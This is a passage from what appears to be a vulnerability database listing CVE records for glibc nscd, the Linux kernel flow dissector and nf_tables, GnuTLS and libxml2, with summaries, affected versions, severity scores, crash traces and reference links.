when the cache was added to nscd.\n\nThis vulnerability is only present in the nscd binary.\n\n" } ], "impacts": [ { "capecId": "CAPEC-130", "descriptions": [ { "lang": "en", "value": "CAPEC-130 Excessive Allocation" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-617", "description": "CWE-617 Reachable Assertion", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-05-06T19:22:07.763Z", "orgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "shortName": "glibc" }, "references": [ { "url": "https://sourceware.org/git/?p=glibc.git;a=blob;f=advisories/GLIBC-SA-2024-0007" }, { "url": "https://security.netapp.com/advisory/ntap-20240524-0014/" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00026.html" }, { "url": "http://www.openwall.com/lists/oss-security/2024/07/22/5" } ], "source": { "discovery": "UNKNOWN" }, "title": "nscd: netgroup cache may terminate daemon on memory allocation failure", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "assignerShortName": "glibc", "cveId": "CVE-2024-33601", "datePublished": "2024-05-06T19:22:07.763Z", "dateReserved": "2024-04-24T20:35:08.340Z", "dateUpdated": "2024-08-02T02:36:04.342Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52580
Vulnerability from cvelistv5
Published
2024-03-02 21:59
Modified
2024-12-19 08:22
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/core: Fix ETH_P_1588 flow dissector
When a PTP ethernet raw frame with a size of more than 256 bytes followed
by a 0xff pattern is sent to __skb_flow_dissect, nhoff value calculation
is wrong. For example: hdr->message_length takes the wrong value (0xffff)
and it does not replicate real header length. In this case, 'nhoff' value
was overridden and the PTP header was badly dissected. This leads to a
kernel crash.
net/core: flow_dissector
net/core flow dissector nhoff = 0x0000000e
net/core flow dissector hdr->message_length = 0x0000ffff
net/core flow dissector nhoff = 0x0001000d (u16 overflow)
...
skb linear: 00000000: 00 a0 c9 00 00 00 00 a0 c9 00 00 00 88
skb frag: 00000000: f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Using the size of the ptp_header struct will allow the corrected
calculation of the nhoff value.
net/core flow dissector nhoff = 0x0000000e
net/core flow dissector nhoff = 0x00000030 (sizeof ptp_header)
...
skb linear: 00000000: 00 a0 c9 00 00 00 00 a0 c9 00 00 00 88 f7 ff ff
skb linear: 00000010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
skb linear: 00000020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
skb frag: 00000000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
Kernel trace:
[ 74.984279] ------------[ cut here ]------------
[ 74.989471] kernel BUG at include/linux/skbuff.h:2440!
[ 74.995237] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI
[ 75.001098] CPU: 4 PID: 0 Comm: swapper/4 Tainted: G U 5.15.85-intel-ese-standard-lts #1
[ 75.011629] Hardware name: Intel Corporation A-Island (CPU:AlderLake)/A-Island (ID:06), BIOS SB_ADLP.01.01.00.01.03.008.D-6A9D9E73-dirty Mar 30 2023
[ 75.026507] RIP: 0010:eth_type_trans+0xd0/0x130
[ 75.031594] Code: 03 88 47 78 eb c7 8b 47 68 2b 47 6c 48 8b 97 c0 00 00 00 83 f8 01 7e 1b 48 85 d2 74 06 66 83 3a ff 74 09 b8 00 04 00 00 eb ab <0f> 0b b8 00 01 00 00 eb a2 48 85 ff 74 eb 48 8d 54 24 06 31 f6 b9
[ 75.052612] RSP: 0018:ffff9948c0228de0 EFLAGS: 00010297
[ 75.058473] RAX: 00000000000003f2 RBX: ffff8e47047dc300 RCX: 0000000000001003
[ 75.066462] RDX: ffff8e4e8c9ea040 RSI: ffff8e4704e0a000 RDI: ffff8e47047dc300
[ 75.074458] RBP: ffff8e4704e2acc0 R08: 00000000000003f3 R09: 0000000000000800
[ 75.082466] R10: 000000000000000d R11: ffff9948c0228dec R12: ffff8e4715e4e010
[ 75.090461] R13: ffff9948c0545018 R14: 0000000000000001 R15: 0000000000000800
[ 75.098464] FS: 0000000000000000(0000) GS:ffff8e4e8fb00000(0000) knlGS:0000000000000000
[ 75.107530] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 75.113982] CR2: 00007f5eb35934a0 CR3: 0000000150e0a002 CR4: 0000000000770ee0
[ 75.121980] PKRU: 55555554
[ 75.125035] Call Trace:
[ 75.127792] <IRQ>
[ 75.130063] ? eth_get_headlen+0xa4/0xc0
[ 75.134472] igc_process_skb_fields+0xcd/0x150
[ 75.139461] igc_poll+0xc80/0x17b0
[ 75.143272] __napi_poll+0x27/0x170
[ 75.147192] net_rx_action+0x234/0x280
[ 75.151409] __do_softirq+0xef/0x2f4
[ 75.155424] irq_exit_rcu+0xc7/0x110
[ 75.159432] common_interrupt+0xb8/0xd0
[ 75.163748] </IRQ>
[ 75.166112] <TASK>
[ 75.168473] asm_common_interrupt+0x22/0x40
[ 75.173175] RIP: 0010:cpuidle_enter_state+0xe2/0x350
[ 75.178749] Code: 85 c0 0f 8f 04 02 00 00 31 ff e8 39 6c 67 ff 45 84 ff 74 12 9c 58 f6 c4 02 0f 85 50 02 00 00 31 ff e8 52 b0 6d ff fb 45 85 f6 <0f> 88 b1 00 00 00 49 63 ce 4c 2b 2c 24 48 89 c8 48 6b d1 68 48 c1
[ 75.199757] RSP: 0018:ffff9948c013bea8 EFLAGS: 00000202
[ 75.205614] RAX: ffff8e4e8fb00000 RBX: ffffb948bfd23900 RCX: 000000000000001f
[ 75.213619] RDX: 0000000000000004 RSI: ffffffff94206161 RDI: ffffffff94212e20
[ 75.221620] RBP: 0000000000000004 R08: 000000117568973a R09: 0000000000000001
[ 75.229622] R10: 000000000000afc8 R11: ffff8e4e8fb29ce4 R12: ffffffff945ae980
[ 75.237628] R13: 000000117568973a R14: 0000000000000004 R15: 0000000000000000
[ 75.245635] ?
---truncated---
References
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52580", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-04T15:52:44.572506Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:22:35.750Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:21.267Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f90a7b9586d72f907092078a9f394733ca502cc9" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/488ea2a3e2666022f79abfdd7d12e8305fc27a40" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/48e105a2a1a10adc21c0ae717969f5e8e990ba48" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/75ad80ed88a182ab2ad5513e448cf07b403af5c3" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/core/flow_dissector.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "f90a7b9586d72f907092078a9f394733ca502cc9", "status": "affected", "version": "4f1cc51f34886d645cd3e8fc2915cc9b7a55c3b6", "versionType": "git" }, { "lessThan": "488ea2a3e2666022f79abfdd7d12e8305fc27a40", "status": "affected", "version": "4f1cc51f34886d645cd3e8fc2915cc9b7a55c3b6", "versionType": "git" }, { "lessThan": "48e105a2a1a10adc21c0ae717969f5e8e990ba48", "status": "affected", "version": "4f1cc51f34886d645cd3e8fc2915cc9b7a55c3b6", "versionType": "git" }, { "lessThan": "75ad80ed88a182ab2ad5513e448cf07b403af5c3", "status": "affected", "version": "4f1cc51f34886d645cd3e8fc2915cc9b7a55c3b6", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/core/flow_dissector.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "5.12" }, { "lessThan": "5.12", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.134", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.56", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/core: Fix ETH_P_1588 flow dissector\n\nWhen a PTP ethernet raw frame with a size of more than 256 bytes followed\nby a 0xff pattern is sent to __skb_flow_dissect, nhoff value calculation\nis wrong. For example: hdr-\u003emessage_length takes the wrong value (0xffff)\nand it does not replicate real header length. In this case, \u0027nhoff\u0027 value\nwas overridden and the PTP header was badly dissected. This leads to a\nkernel crash.\n\nnet/core: flow_dissector\nnet/core flow dissector nhoff = 0x0000000e\nnet/core flow dissector hdr-\u003emessage_length = 0x0000ffff\nnet/core flow dissector nhoff = 0x0001000d (u16 overflow)\n...\nskb linear: 00000000: 00 a0 c9 00 00 00 00 a0 c9 00 00 00 88\nskb frag: 00000000: f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n\nUsing the size of the ptp_header struct will allow the corrected\ncalculation of the nhoff value.\n\nnet/core flow dissector nhoff = 0x0000000e\nnet/core flow dissector nhoff = 0x00000030 (sizeof ptp_header)\n...\nskb linear: 00000000: 00 a0 c9 00 00 00 00 a0 c9 00 00 00 88 f7 ff ff\nskb linear: 00000010: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\nskb linear: 00000020: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\nskb frag: 00000000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n\nKernel trace:\n[ 74.984279] ------------[ cut here ]------------\n[ 74.989471] kernel BUG at include/linux/skbuff.h:2440!\n[ 74.995237] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\n[ 75.001098] CPU: 4 PID: 0 Comm: swapper/4 Tainted: G U 5.15.85-intel-ese-standard-lts #1\n[ 75.011629] Hardware name: Intel Corporation A-Island (CPU:AlderLake)/A-Island (ID:06), BIOS SB_ADLP.01.01.00.01.03.008.D-6A9D9E73-dirty Mar 30 2023\n[ 75.026507] RIP: 0010:eth_type_trans+0xd0/0x130\n[ 75.031594] Code: 03 88 47 78 eb c7 8b 47 68 2b 47 6c 48 8b 97 c0 00 00 00 83 f8 01 7e 1b 48 85 d2 74 06 66 83 3a ff 74 09 b8 00 04 00 00 eb ab \u003c0f\u003e 0b b8 00 01 00 00 eb a2 48 85 ff 74 eb 48 8d 54 24 06 31 f6 b9\n[ 75.052612] RSP: 0018:ffff9948c0228de0 EFLAGS: 00010297\n[ 75.058473] RAX: 00000000000003f2 RBX: ffff8e47047dc300 RCX: 0000000000001003\n[ 75.066462] RDX: ffff8e4e8c9ea040 RSI: ffff8e4704e0a000 RDI: ffff8e47047dc300\n[ 75.074458] RBP: ffff8e4704e2acc0 R08: 00000000000003f3 R09: 0000000000000800\n[ 75.082466] R10: 000000000000000d R11: ffff9948c0228dec R12: ffff8e4715e4e010\n[ 75.090461] R13: ffff9948c0545018 R14: 0000000000000001 R15: 0000000000000800\n[ 75.098464] FS: 0000000000000000(0000) GS:ffff8e4e8fb00000(0000) knlGS:0000000000000000\n[ 75.107530] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 75.113982] CR2: 00007f5eb35934a0 CR3: 0000000150e0a002 CR4: 0000000000770ee0\n[ 75.121980] PKRU: 55555554\n[ 75.125035] Call Trace:\n[ 75.127792] \u003cIRQ\u003e\n[ 75.130063] ? eth_get_headlen+0xa4/0xc0\n[ 75.134472] igc_process_skb_fields+0xcd/0x150\n[ 75.139461] igc_poll+0xc80/0x17b0\n[ 75.143272] __napi_poll+0x27/0x170\n[ 75.147192] net_rx_action+0x234/0x280\n[ 75.151409] __do_softirq+0xef/0x2f4\n[ 75.155424] irq_exit_rcu+0xc7/0x110\n[ 75.159432] common_interrupt+0xb8/0xd0\n[ 75.163748] \u003c/IRQ\u003e\n[ 75.166112] \u003cTASK\u003e\n[ 75.168473] asm_common_interrupt+0x22/0x40\n[ 75.173175] RIP: 0010:cpuidle_enter_state+0xe2/0x350\n[ 75.178749] Code: 85 c0 0f 8f 04 02 00 00 31 ff e8 39 6c 67 ff 45 84 ff 74 12 9c 58 f6 c4 02 0f 85 50 02 00 00 31 ff e8 52 b0 6d ff fb 45 85 f6 \u003c0f\u003e 88 b1 00 00 00 49 63 ce 4c 2b 2c 24 48 89 c8 48 6b d1 68 48 c1\n[ 75.199757] RSP: 0018:ffff9948c013bea8 EFLAGS: 00000202\n[ 75.205614] RAX: ffff8e4e8fb00000 RBX: ffffb948bfd23900 RCX: 000000000000001f\n[ 75.213619] RDX: 0000000000000004 RSI: ffffffff94206161 RDI: ffffffff94212e20\n[ 75.221620] RBP: 0000000000000004 R08: 000000117568973a R09: 0000000000000001\n[ 75.229622] R10: 000000000000afc8 R11: ffff8e4e8fb29ce4 R12: ffffffff945ae980\n[ 75.237628] R13: 000000117568973a R14: 0000000000000004 R15: 0000000000000000\n[ 75.245635] ? \n---truncated---" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:22:00.251Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/f90a7b9586d72f907092078a9f394733ca502cc9" }, { "url": "https://git.kernel.org/stable/c/488ea2a3e2666022f79abfdd7d12e8305fc27a40" }, { "url": "https://git.kernel.org/stable/c/48e105a2a1a10adc21c0ae717969f5e8e990ba48" }, { "url": "https://git.kernel.org/stable/c/75ad80ed88a182ab2ad5513e448cf07b403af5c3" } ], "title": "net/core: Fix ETH_P_1588 flow dissector", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52580", "datePublished": "2024-03-02T21:59:47.231Z", "dateReserved": "2024-03-02T21:55:42.569Z", "dateUpdated": "2024-12-19T08:22:00.251Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-6040
Vulnerability from cvelistv5
Published
2024-01-12 01:37
Modified
2024-08-02 08:21
Severity ?
EPSS score ?
Summary
An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.
References
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | The Linux Kernel Organization | linux |
Version: 0 ≤ |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:21:17.118Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "issue-tracking", "x_transferred" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040" }, { "tags": [ "mailing-list", "x_transferred" ], "url": "https://www.openwall.com/lists/oss-security/2024/01/12/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/01/12/1" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "packageName": "linux", "platforms": [ "Linux" ], "product": "linux", "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git", "vendor": "The Linux Kernel Organization", "versions": [ { "lessThan": "5.18-rc1", "status": "affected", "version": "0", "versionType": "semver" } ] } ], "credits": [ { "lang": "en", "type": "finder", "value": "Lin Ma from Ant Security Light-Year Lab \u0026 ZJU" } ], "descriptions": [ { "lang": "en", "value": "An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-125", "description": "CWE-125", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-12T01:37:45.387Z", "orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "shortName": "canonical" }, "references": [ { "tags": [ "issue-tracking" ], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040" }, { "tags": [ "mailing-list" ], "url": "https://www.openwall.com/lists/oss-security/2024/01/12/1" }, { "url": "http://www.openwall.com/lists/oss-security/2024/01/12/1" }, { "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" }, { "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html" } ], "title": "An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family)", "workarounds": [ { "lang": "en", "value": "Disabling unprivileged user namespaces mitigates the issue." } ] } }, "cveMetadata": { "assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc", "assignerShortName": "canonical", "cveId": "CVE-2023-6040", "datePublished": "2024-01-12T01:37:45.387Z", "dateReserved": "2023-11-08T20:12:50.288Z", "dateUpdated": "2024-08-02T08:21:17.118Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-28835
Vulnerability from cvelistv5
Published
2024-03-21 06:13
Modified
2024-11-24 15:04
Severity ?
EPSS score ?
Summary
A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the "certtool --verify-chain" command.
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2024:1879 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2570 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:2889 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2024-28835 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2269084 | issue-tracking, x_refsource_REDHAT | |
https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html |
Impacted products
Vendor | Product | Version | |||||||||||||||||||||||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ |
Version: 3.8.3 |
||||||||||||||||||||||||||||||||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-28835", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-21T18:00:08.506389Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:15.160Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-11-22T12:04:48.736Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/22/1" }, { "tags": [ "x_transferred" ], "url": "http://www.openwall.com/lists/oss-security/2024/03/22/2" }, { "name": "RHSA-2024:1879", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1879" }, { "name": "RHSA-2024:2570", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2570" }, { "name": "RHSA-2024:2889", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2889" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2024-28835" }, { "name": "RHBZ#2269084", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2269084" }, { "tags": [ "x_transferred" ], "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html" }, { "url": "https://security.netapp.com/advisory/ntap-20241122-0009/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://gitlab.com/gnutls/gnutls/", "defaultStatus": "unaffected", "packageName": "gnutls", "versions": [ { "status": "affected", "version": "3.8.3" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-23.el9_3.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.8.3-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-23.el9_3.4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::appstream" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.8.3-4.el9_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:3.7.6-21.el9_2.3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unknown", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unknown", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8" ], "defaultStatus": "unaffected", "packageName": "gnutls", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat" } ], "datePublic": "2024-03-21T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A flaw has been discovered in GnuTLS where an application crash can be induced when attempting to verify a specially crafted .pem bundle using the \"certtool --verify-chain\" command." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-248", "description": "Uncaught Exception", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-24T15:04:40.246Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2024:1879", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1879" }, { "name": "RHSA-2024:2570", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2570" }, { "name": "RHSA-2024:2889", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:2889" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2024-28835" }, { "name": "RHBZ#2269084", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2269084" }, { "url": "https://lists.gnupg.org/pipermail/gnutls-help/2024-March/004845.html" } ], "timeline": [ { "lang": "en", "time": "2024-03-11T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2024-03-21T00:00:00+00:00", "value": "Made public." } ], "title": "Gnutls: potential crash during chain building/verification", "workarounds": [ { "lang": "en", "value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability." } ], "x_redhatCweChain": "CWE-248: Uncaught Exception" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2024-28835", "datePublished": "2024-03-21T06:13:26.916Z", "dateReserved": "2024-03-11T14:43:43.973Z", "dateUpdated": "2024-11-24T15:04:40.246Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-25062
Vulnerability from cvelistv5
Published
2024-02-04 00:00
Modified
2024-08-01 23:36
Severity ?
EPSS score ?
Summary
An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-01T23:36:21.588Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://gitlab.gnome.org/GNOME/libxml2/-/tags" }, { "tags": [ "x_transferred" ], "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in libxml2 before 2.11.7 and 2.12.x before 2.12.5. When using the XML Reader interface with DTD validation and XInclude expansion enabled, processing crafted XML documents can lead to an xmlValidatePopElement use-after-free." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2024-02-04T16:04:53.794792", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/tags" }, { "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/604" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2024-25062", "datePublished": "2024-02-04T00:00:00", "dateReserved": "2024-02-04T00:00:00", "dateUpdated": "2024-08-01T23:36:21.588Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45289
Vulnerability from cvelistv5
Published
2024-03-05 22:22
Modified
2024-11-04 18:24
Severity ?
EPSS score ?
Summary
